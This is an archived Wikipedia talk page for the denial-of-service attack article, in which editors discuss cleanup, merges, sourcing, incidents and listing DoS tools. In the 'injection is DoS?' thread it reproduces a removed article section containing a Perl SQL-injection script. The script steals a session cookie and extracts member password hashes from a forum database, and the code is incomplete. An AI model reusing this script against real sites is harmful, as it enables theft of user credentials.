Talk:Denial-of-service attack/Archive 1

From Wikipedia, the free encyclopedia
Jump to: navigation, search

Twinge Attack?[edit]

Twinge attack is not mentioned at all and is an orphaned page so it might want to be included under ICMP flood.

Image DoSed[edit]

Interestingly, the image portraining DoS is DoSed. Ironic and very frustrating. At least IE and FF can't make it work, dunno about opera. 6/4/08 —Preceding unsigned comment added by (talk) 08:46, 4 June 2008 (UTC)

Protected on 2006 April 18[edit]

Reason: Vulgarisms or nonsense was continuously added from different IPs to the article, or large portions removed. --Boborok 07:43, 18 April 2006 (UTC)


Bleh, I'm just going to start cleaning up this article starting at the top. It's going to be rough at first because I'm going to be more concentrated on changing the overall layout. Does anyone have any objections to removing the stuff that reads like an ad? Otherwise I'll do away with it and just pick out key points to be integrated into other sections. fintler 15:45, 23 June 2006 (UTC)

Syn attack is miscategorized under ICMP attacks. Syn attack is a TCP based attack. -Doug —Preceding unsigned comment added by (talk) 08:16, 15 August 2008 (UTC)

Rewrote DDoS bit[edit]

Added some references I was bored.

Removed some of the stuff in the prevention and response section it was just leading up to the advertising that has previously been removed. Some of it was broad generalisations with no references backing it up some of it was factually wrong, This article needs some attention ;-)

It would be interesting to hear from the original author of the prevention and response section. deleted most of the prevention bit so I reverted to revert by Omicronpersei8. 12:28, 24 July 2006 (UTC)

Discussion Points[edit]

I'm merging all of the old discussion (some going back to 2003-2004) and putting the points here so they can be discussed easier:

  1. Perhaps some mention should be given to the architecture of the internet responsible for unwanted outcomes by too-many-requests to begin with. other network protocols exist which benefit rather than degrade with increased scaling of requests. Freenet is one example.
  2. The similarity with slashdotting.
  3. "A final option, one which might be available to larger companies and networks, is to throw more hardware or bandwidth at the flood and wait it out."
  4. "A distributed reflector denial of service is an internet attack of a type first detected in 2005 ..." What? You are about 4 years late. Check that and correct it please.
  5. Mention of operating system/kernel-level defences
  6. Removing the ad-like content towards the bottom along with related ads —Preceding unsigned comment added by Fintler (talkcontribs)

New category 'Computer Network Security'[edit]

I propose to create a new category 'Computer Network Security' assign the same to this article along with many other related articles. Raanoo 06:51, 31 July 2006 (UTC)

There is already such a category, Category:Computer network security. This article's category, Category:Denial-of-service attacks, is in that category. It is a good idea for someone to go through the related article list as suggested to ensure that any articles that properly belong in this category or one of its subs are placed there. JonHarder 13:28, 31 July 2006 (UTC)
I think that much of what is on the DOS category could be moved into the DOS article. That will give the article a better chance of reaching featured status. It will also get rid of the problem described above since the only sub-articles that would survive are those that are large enough to be left alone. Thus, most of the stuff on the DOS category could be moved, once this is done, into the Computer Network Security cat. I will slowly work on it. Brusegadi 06:07, 28 August 2007 (UTC)

DDos section innacuracies[edit]

A quick read of this article, and I can already see that it needs a lot of help. I will rewrite the next section to be a) correct b) readable.

A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system usually a web server(s). These systems are compromised by attackers using a variety of methods.

A few notes on this:

  1. "...when multiple compromised systems..." - The systems do not have to be compromised. DDos attacks are just as commonly from groups of willing users who don't realise they aren't anonymous. (ie script kiddies)
  2. "...usually a web server(s)..." - DDoS attacks affect clients just as (if not more) often than webservers. (see IRC_floods) This is the a big reason why some like to use Tor, to hide their IP from being DDoSed.
  3. Webserver DDoSes may actually be the Slashdot effect, but misdiagnosed. Client DDoSes are more of an IRC thing, but remember that the internet is not just WWW.
  4. Would we consider a crapflood a DDoS?

Happy editing to all. Michael Billington (talkcontribs) 11:28, 6 August 2006 (UTC)

injection is DoS?[edit]

Should the === MySQL injection === section be in this article? although sql injection can cause a DoS condition, it is not a DoS attack in itself is it? If it is considered a DoS attack, should the code be a little bit more illustrative? it simply displays a general sql injection, not an sql injection that causes a DoS condition.

Overall i feel the section with sourcecode is confusing.

fv. —The preceding unsigned comment was added by Fedevela (talkcontribs) 17:24, 15 August 2006 (UTC).

It's OK by me to remove the section. The code portion isn't appropriate for an article. See WP:NOT an instruction manual. JonHarder 17:33, 15 August 2006 (UTC)

I will see if instead of completely removing the entry, I draft a DoS attack through an SQL injection. Will post it as soon as it is presentable. I'm excited on my first wikipedia contribution!!! Thanks for your reply Jon. Fedevela 20:09, 15 August 2006 (UTC)

Sounds good & welcome Wikipedia! JonHarder 20:35, 15 August 2006 (UTC)

Putting the old section here for now.

MySQL injection[edit]

MySQL is a free databasing language and program used in most forums to organize various rows and manage the site's sub-server. A MySQL Injection is a malformed MySQL code that affects the targeted database in varying ways. Due to safety reasons, the method of applying a MySQL Injection will be withheld. A written example of an injection is as follows:

#Greetz or begining message of the 404 would go here.
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
$topic = $ARGV[2];
$id = $ARGV[3];
if (@ARGV < 4) {
 print "---------------------------------------------------------\n";
 print "-- This is a MySQL Injection --\n";
 print "-- Coded by Some Hacker --\n";
 print "-- I am a n00b Hacker --\n";
 print "-- Usage: $0 [host] [path] [topic] [id] --\n";
 print "-- Ex: $0 cws 2 2 --\n";
 print "---------------------------------------------------------\n";
$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a     connection\n";
print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n";
print $sock "User-Agent: Mozilla/4.0\n";
print $sock "Host: $host\n\n";
while ($asd = <$sock>) {
        if ($asd =~ /Set-Cookie:/gi) {
            $asd =~ /cuser_id=([a-zA-Z0-9]{32})/;
            $cookie = $1;
$socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a  connection\n";
print "-- Connection Established --\n";
print $socket "GET   /$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/*  HTTP/1.0\n";
print $socket "User-Agent: Mozilla/4.0\n";
print $socket "Host: $host\n";
print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n";
print "-- Waiting... --\n";
while($ans = <$socket>) {
       if ($ans =~ /([a-zA-Z0-9]{32})/){
            if ($ans =~ /cookie/i) {
            print "\nmember id: $id \n";
            print "md5 hash: $1 \n";

Coded By: Derek H.

Fedevela 11:26, 16 August 2006 (UTC)

OK! finished editing that section ... i have not tested the code, and i am not positive you can insert EL expressions in the SQL tag like i'm doing. Nevertheless I think this sample illustrates the relationship between DoS and SQLInjection. Please let me know what you think! Fedevela 14:30, 16 August 2006 (UTC)

Should there be code offered here?[edit]

Given the extremely slow performance of Wikipedia navigation and page refreshes at certain times (earlier this afternoon, for example) while other sites respond normally, my non-technical suspicious mind wonders if there's a denial of service attack going on. I don't have the background to understand the code posted above, but based on the comments surrounding it I have to wonder if it's a good idea to allow such code examples anywhere at Wikipedia. --CliffC 21:24, 9 October 2006 (UTC)


The person who hacked the box is NOT eligible, nor are members of the Honeynet Project. Members of the Honeynet Research Alliance or companies employing Honeynet Project members are eligible (and encouraged!) to enter, but their entries (even if Top 20) will not receive copies of Know Your Enemy. The books go to other entrants.

From the Honeywell Project page. No particular relevance to this article; just thought it was amusing. :p --Veratien 01:03, 2 December 2006 (UTC)

Client Puzzle Protocol[edit]

- has been proposed as a solution to DoS. Maybe we should mention this? —The preceding unsigned comment was added by Cdamama (talkcontribs) 03:05, 13 December 2006 (UTC).

looks completely useless to me. Most DoS attacks do not require a complete connection to be made so any sort of "puzzle protocol" can't even be started. Wrs1864 03:11, 13 December 2006 (UTC)


If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

No. "Accidentally breaking the internet" is not why ISPs ban DoS attacks. ISPs ban DoS attacks because they intentionally break the internet. (See TOS §3.1.1 Breaking the Internets)

Removed second sentence. —Ryan 06:54, 6 March 2007 (UTC)

Removed make technical articles accessible tag[edit]

The {{technical}} tag was added June 23 of 2006, but I'm not entirely clear on why, or that it remains applicable. I've gone ahead and removed it.

If anyone believes it still applies, feel free to re-add it — but please provide a specific explanation of why it's necessary, as per these standards: "You should put an explanation on the talk page with comments on why you believe it is too technical, or suggestions for improvement. Templates added without explanation are likely to be either ignored or removed." livefastdieold 00:41, 15 April 2007 (UTC)

Cleaned up links[edit]

I cleaned up the links as there were mulitbles of the same site and un-needed links that were borderline spam. Warrush

Merge from Nuke[edit]

I think the merge is good. I will do it if the editors who are most involved with this page think it is not a problem. I think merging them will give this article a boost towards featured status. Brusegadi 00:23, 26 August 2007 (UTC)

Done! Brusegadi 05:52, 28 August 2007 (UTC)

Merge from Teardrop[edit]

The source is so small that, at least for now, it makes sense to merge. I will proceed as I did with the merge for nuke. Brusegadi 06:54, 29 August 2007 (UTC)

Done. Brusegadi 05:09, 31 August 2007 (UTC)


What do we think about this statement?

Although most DDoS attacks are malicious in nature, the same technique can be used to aid the Internet community. --Leus 21:07, 4 September 2007 (UTC)

Should be removed. I will go through the entire article and look for proper sources and remove such statements. Thanks for the note. Brusegadi 04:26, 5 September 2007 (UTC)

Fair use rationale for Image:Yahelitescrnscap.JPG[edit]

Nuvola apps important.svg

Image:Yahelitescrnscap.JPG is being used on this article. I notice the image page specifies that the image is being used under fair use but there is no explanation or rationale as to why its use in this Wikipedia article constitutes fair use. In addition to the boilerplate fair use template, you must also write out on the image description page a specific explanation or rationale for why using this image in each article is consistent with fair use.

Please go to the image description page and edit it to include a fair use rationale. Using one of the templates at Wikipedia:Fair use rationale guideline is an easy way to insure that your image is in compliance with Wikipedia policy, but remember that you must complete the template. Do not simply insert a blank template on an image page.

If there is other fair use media, consider checking that you have specified the fair use rationale on the other images used on this page. Note that any fair use images uploaded after 4 May, 2006, and lacking such an explanation will be deleted one week after they have been uploaded, as described on criteria for speedy deletion. If you have any questions please ask them at the Media copyright questions page. Thank you.

BetacommandBot 18:31, 13 September 2007 (UTC)

Merge with Meow wars[edit]

Someone tagged Meow wars to merge here. Discuss.

  • Support. It has no evidence of notability or much in the way of reliable sources itself, so does not rate a whole article, but there's enough to it to be worth a mention in the topic it applies to. Dicklyon 16:07, 23 September 2007 (UTC)
  • Go for it. Just name the subsection 'Meow wars' or something and then only transfer a shortened version of everything. Note that if you move the entire thing the article is going to get too big. Brusegadi 16:40, 23 September 2007 (UTC)
  • Oppose (I think). Meow wars seems closer to a social phenomenon than a denial of service (are we next going to add Wikipedia vandalism, spam (electronic), and any number of random flame wars and people trying to annoy each other on the net?). The meow wars article could use some work, but I'd probably sooner merge it to Usenet than to here. Or keep it as its own article; it was kind of a big deal within the world of usenet even if it seems obscure in a wider context (establishing WP:N is kind of a can of worms for many online phenomena, but that's an issue whether it is its own article or just a section in another article). Kingdon 18:06, 16 October 2007 (UTC)
Actually that isn't really true. Notability matters in all cases but there are a lot of things which are noteable enough for a brief mention in another article but not for a seperate article Nil Einne 12:50, 21 October 2007 (UTC)
  • I have to agree with Kingdon. I think that the Meow wars page needs more work before it's merged with anything really. Perhaps you could make reference to the Meow wars being an early/primitive form of DOS attack and link to the article? Where the article stands now, I don't think there's enough solid information and sources cited to back up what's been said. CoyoteWildfire 10:14, 24 October 2007
  • Oppose Meow wars is an interesting article in its own right, but it needs some work. Bitplane 23:37, 17 December 2007 (UTC)
  • Oppose, as people have pointed out they are not quite the same thing as well as merging serves no useful purpose regardless in this instance. Mathmo Talk 00:40, 24 January 2008 (UTC)

Anonymous vs. Church of Scientology[edit] —Preceding unsigned comment added by (talk) 19:17, 27 January 2008 (UTC)


Just found this on ITPROs news section:

"DOS attacks are also becoming increasingly common. During the first six months of 2006, Symantec observed an average of 6,110 DoS attacks per day."

Anyone think the statistic is worth including? It'll give a better idea of how occurrent the problem has become...

Also, I'm rubbish at editing so if anyone wants to put it in... —Preceding unsigned comment added by (talk) 07:45, 18 March 2008 (UTC)

Not completely wikified.[edit]

I've added some internal links to the section that needs to be wikified, but I don't feel that there are enough for it to be up to Wikipedia's standards. I've also changed the acronym "DDoS" in that section to "DoS" (but in that section only) because, from my understadning, a DDoS attack is just a form of a DoS attack. I didn't remove the Wikify template, though, becasue I felt that it wasn't up to standard. Thanks. Totakeke423 (talk) 10:25, 29 March 2008 (UTC)


The following suggestions were generated by a semi-automatic javascript program, and might not be applicable for the article in question.

  • There may be an applicable infobox for this article. For example, see Template:Infobox Biography, Template:Infobox School, or Template:Infobox City.[?] (Note that there might not be an applicable infobox; remember that these suggestions are not generated manually)
  • When writing standard abbreviations, the abbreviations should not have a 's' to demark plurality (for example, change kms to km and lbs to lb).
  • There are a few occurrences of weasel words in this article- please observe WP:AWT. Certain phrases should specify exactly who supports, considers, believes, etc., such a view.
    • correctly
    • might be weasel words, and should be provided with proper citations (if they already do, or are not weasel terms, please strike this comment).[?]
  • Watch for redundancies that make the article too wordy instead of being crisp and concise. (You may wish to try Tony1's redundancy exercises.)
    • Vague terms of size often are unnecessary and redundant - “some”, “a variety/number/majority of”, “several”, “a few”, “many”, “any”, and “all”. For example, “All pigs are pink, so we thought of a number of ways to turn them green.”
  • Avoid using contractions like (outside of quotations): doesn't, aren't.
  • Please ensure that the article has gone through a thorough copyediting so that it exemplifies some of Wikipedia's best work. See also User:Tony1/How to satisfy Criterion 1a.[?]

You may wish to browse through User:AndyZ/Suggestions for further ideas. Thanks, CWii(Talk|Contribs) 22:04, 2 May 2008 (UTC)

political examples[edit]

The article is missing info on examples of politically motivated DoSs; see [1] --Espoo (talk) 13:11, 21 May 2008 (UTC)

I see someone has recently added some political examples. Unfortunately, what was added strongly suggest partisan politial motive more than any desire to add to the article's factual content.

The story about the DOS attacks that were traced back to addresses belonging to appeared almost simultaneously on a number of anti-Obama and far-right blogs and forums. The addition to the Wikipedia article was made almost immediately, and the wording echos what you'll find on those same blogs and forums. The links found in the article footnotes lead to such blogs. These hardly constitute reliable sources.

Obviously there's a fundamental illogic to the thought that Obama supporters would launch a DOS attack from addresses that would immediately be traced to When one considers how easily ownership information can be falsified when registering an IP address, it's pretty obvious what's going on here. Conspiracy theorists like the term "false flag operation". A factual Wikipedia article is being used to lend credibility to the scam.

The addition should be removed immediately, unless credible sources can be cited that clearly establish a connection between the Obama campaign and the DOS attack. I have no official standing at Wikipedia, so I will not presume to do that myself. GSH4.224.132.19 (talk) 01:04, 5 August 2008 (UTC)

Relevant Incidents[edit]

Is the 4chan DDoS attack really big and relevant enough to be included in the Incidents section? Sure it is currently being DDoSed, but if we included every time a chan site or other internet community has been DDoSed this section would be way too long. Heck, this isn't even the first time 4chan has been a victim of this kind of attack. I didn't make the edit and remove the 4chan reference because I wanted to hear some more opinions, but I think we should consider whether we want to make this list more inclusive and add more incidents, or short and only referencing the most famous examples, as it currently is. (talk) 02:30, 28 July 2008 (UTC)


Is anyone else bothered by this page treating wired and wireless attacks separately? Are we including RF jamming as a DoS attack? While yes, taken literally, it is a denial of service, I think categorizing wired and wireless attacks as different beasts is the wrong approach.

A DoS attack is a data-based attack on a network layer. It has to take place based on the rules of the network data layer. Overloading WiFi antennas seems like the same sort of attack as hooking a car battery up to an Ethernet cable. Effective, but not the kind of DoS that this article should deal with. Alvis (talk) 07:09, 27 December 2008 (UTC)

If it deals with Dos it should deal with all Dos, and there stealing your power cable is a sort of Dos attack. 21:17 14/2 2009 (GMT) —Preceding unsigned comment added by (talk)

Agreed, but stipulating high gain antennae and 300mW cards branded NIC manufactured by a particular company and not widely available outside the United States? Perhaps not relevant... Andmark (talk) 01:52, 11 June 2009 (UTC)

Removal of DoS-attacks program list from article[edit]

This list of programs has been removed from the article many times in the past.

Considering a white paper was provided as a proper reference and clearly names most of these programs[2] and considering the rest seem to pass the search engine test, they can hardly be considered "not notable".

Wikipedia is not censored and simply mentioning these programs alone does not make this a "howto" guide.

This list is far from complete and only seems to mention a handful of the many DoS programs. A complete list and thorough overview of these programs would likely require a separate article but this hardly justifies removing them outright.

Tothwolf (talk) 01:00, 1 February 2009 (UTC)

This list of program names doesn't add much besides clutter to the article, and it attacts people who like to add other program names that they have heard of. If these programs were really that significant, at least a few of them should have articles by now. As it is, it is just a list of names that some people claim are used for DoS attacks. Search engine tests are, as the article says, a first-pass heuristic. Wikipdia is WP:NOT an WP:INDISCRIMINATE collection of information. This is not censorship, this is just applying WP:WEIGHT. Any "list of" article that lists these kinds of programs will likely need to grab more sources and will start with a longer list, but considering how quickly these kind of programs surface and then disappear, I'm not sure if there will ever be such an article. Wrs1864 (talk) 02:56, 1 February 2009 (UTC)
If this information was indeed WP:INDISCRIMINATE and not properly sourced, I would agree with you. However, these programs are mentioned in the whitepaper provided as the reference to this section and are very much valid to the subject of this article. I was able to find other references fairly quickly with Google so it wouldn't be difficult for someone so inclined to further expand this section. As for WP:WEIGHT, I can't see how you'd even begin to apply that to this list.
I will agree with you in that lists can sometimes add clutter to an article. In this particular case this list is short and doesn't seem to hurt the rest of the article in any way.
As for people adding to a list, Wikipedia would not exist if people did not take the time to expand articles. That may involve anything from simply adding information to a list to expanding a stub to rewriting entire articles.
I would ask that you revert your last edit where you again removed this list and leave these intact until a clear consensus can be had on this matter. Tothwolf (talk) 03:39, 1 February 2009 (UTC)

Hack a Day Reference?[edit]

I don't really like how the article is worded to seem as though Hack a Day is an organization of computer hackers. Anyone who visits Hack a Day (like myself) would find that Hack a Day is simply a weblog (Such as Engadget) that breaks news about technology and how it can be "hacked" for recreational purposes. They do not condone illegal activities. Plus, if you look at the other sources for that same paragraph, Arstechnica and Softpedia also ran similar articles but they were not mentioned. Someone please revise this biased wording.

Merge from billion laughs attack[edit]

I just briefly put together an article about the Billion laughs attack, which should probably in the end be merged with this article. But right now it is not up to standard, so some of you guys might want to improve it first. --Eyetoy2 (talk) 12:19, 12 June 2009 (UTC)

Stop associating Windows 7 and teardrop![edit]

Guys, the article on Slashdot about Windows 7's vulnerability has NOTHING to actually do with teardrop! It was only an example of a previously known exploit. It's the slashdot equivalent of media hype. They are NOT the same thing in any way. teardrop is generic to IP packets. The new exploit is SPECIFIC to an SMB "negotiate protocol request" query. (talk) 07:42, 13 September 2009 (UTC)

needs a redirect from "dos attacks" and "DOS attacks" for clarity.[edit]

Seems the article needs a redirect from "dos attacks" and "DOS attacks" for clarity and ease of use. If the page is to be accessible for people who want to know the definition one cannot presume they are aware of the minuscule in the letter o in the term DoS attack. —Preceding unsigned comment added by (talk) 02:45, 9 October 2009 (UTC)